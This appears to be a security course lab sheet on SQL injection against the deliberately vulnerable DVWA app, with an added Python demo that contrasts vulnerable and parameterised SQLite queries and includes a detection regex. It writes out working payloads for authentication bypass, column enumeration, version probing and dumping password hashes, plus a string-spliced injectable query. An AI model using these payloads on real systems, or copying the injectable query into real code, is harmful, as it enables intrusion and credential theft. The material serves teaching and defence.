Part 2 Executing SQLi Attacks
7. Click the SQL Injection button in the DVWA navigation bar
a. Test to see whether this application was built to handle special characters: enter O'Reilly in the text field and click the 'submit' button.
b. You should see an error page; this is due to a poorly written web page. Click the back button.
c. Type a' OR 'x'='x';# and click submit.
d. Take a screen shot of the result
8. Determine how many columns are in the database
a. Type a' ORDER BY 1;# and click submit. You should see no result and no error; this means there is at least one column in the database.
b. Type a' ORDER BY 2;# and click submit. You should see no result and no error; this means there are at least two columns in the database.
c. Type a' ORDER BY 3;# and click submit. You should see an error; this means there are exactly two columns in the database.
d. Take a screen shot of the result
9. Determine the name of the database columns
a. Now, let's try and figure out the names of those columns! Type a' OR firstname IS NULL;# and click submit. You should get an error message. This is OK; it means that the column is not called firstname. Let's try some more.
b. Type a' OR first_name IS NULL;# and click submit. If the result is empty and there is no error, this is good: we found the name of a column in the database.
c. Now that we have found the name of the column, let's try and find some usernames in the database. It could be hard to go through a complete list of names, so let's search for people that have a 'P' in their name using the LIKE statement: a' OR first_name LIKE '%P%';#
d. Take a screen shot of the result
10. Determine the version of the database
a. Let's change gears for a moment and see whether we can determine the version of the database that is running. Type a' UNION ALL SELECT 1, @@version;# and click submit.
b. Take a screen shot of the result
c. Attackers can also make use of the database administrator's account. Try this command to see whether we can determine the user account: a' UNION ALL SELECT system_user(),user();#
d. Take a screen shot of the result
11. Steal the password hashes
a. Time to dump the password hashes of all the users: a' union select null,concat(first_name,0x0a,password) from users;#
b. Take a screen shot of the result
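The following is an added example, not part of this lab sheet or of DVWA's own code. It rebuilds the lab's lookup in an in-memory SQLite database so the behaviour behind steps 7 to 11 can be seen end to end: the same tautology, ORDER BY and UNION inputs change the query when the id is spliced into the SQL string, and do nothing when the id is passed as a bound parameter. SQLite stands in for MySQL, so the lab's `#` line comment becomes `--`, `concat(...)` becomes `||`, and the `@@version`/`user()` probes have no equivalent and are left out. The user rows and the hash strings are constructed placeholders, and `looks_like_injection` is a hypothetical monitoring heuristic for flagging inputs in request logs; it is a detection aid, not a substitute for the parameterised query.

```python
import re
import sqlite3

# Constructed stand-in for DVWA's users table. The "hash" strings are placeholders, not real digests.
SAMPLE_USERS = [
    (1, "admin", "admin", "<placeholder-hash-1>"),
    (2, "Gordon", "Brown", "<placeholder-hash-2>"),
    (3, "Pablo", "Picasso", "<placeholder-hash-3>"),
]

# The lab's inputs, adapted to SQLite: "--" replaces MySQL's "#" comment, "||" replaces concat().
PAYLOADS = {
    "tautology": "a' OR 'x'='x' --",      # 'x'='x' is always true: every row comes back
    "order_by_2": "a' ORDER BY 2 --",     # the SELECT has two columns: no error, no rows
    "order_by_3": "a' ORDER BY 3 --",     # there is no third column: the database errors
    "dump_hashes": "a' UNION SELECT NULL, first_name || char(10) || password FROM users --",
}


def build_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The lab's flaw: the untrusted id is pasted into the SQL text, so it can rewrite the query."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '%s';" % user_id
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """The fix: the id is bound as a value, so the database never parses it as SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?;"
    return conn.execute(query, (user_id,)).fetchall()


def run(lookup, conn, payload):
    """Rows the lookup returns, or the string 'ERROR' when the database rejects the query."""
    try:
        return lookup(conn, payload)
    except sqlite3.Error:
        return "ERROR"


# Hypothetical log-monitoring heuristic: a quote followed by OR/UNION/ORDER BY, a comment marker,
# or the @@version probe. A legitimate value such as O'Reilly does not match.
SUSPICIOUS = re.compile(r"'\s*(or|union|order\s+by)\b|--|#|@@version", re.IGNORECASE)


def looks_like_injection(value):
    """True when the input carries one of the patterns used in the lab."""
    return bool(SUSPICIOUS.search(value))


if __name__ == "__main__":
    db = build_db()
    print("normal id 1 ->", run(lookup_vulnerable, db, "1"))
    for name, payload in PAYLOADS.items():
        print(f"{name:12} vulnerable -> {run(lookup_vulnerable, db, payload)}")
        print(f"{name:12} safe       -> {run(lookup_safe, db, payload)}")
        print(f"{name:12} flagged    -> {looks_like_injection(payload)}")
```

Running it shows the column-count probe from step 8 directly: ORDER BY 2 returns an empty result while ORDER BY 3 raises an error, because the SELECT projects exactly two columns. Against `lookup_safe` every payload returns an empty list, since the whole string is compared with `user_id` as data.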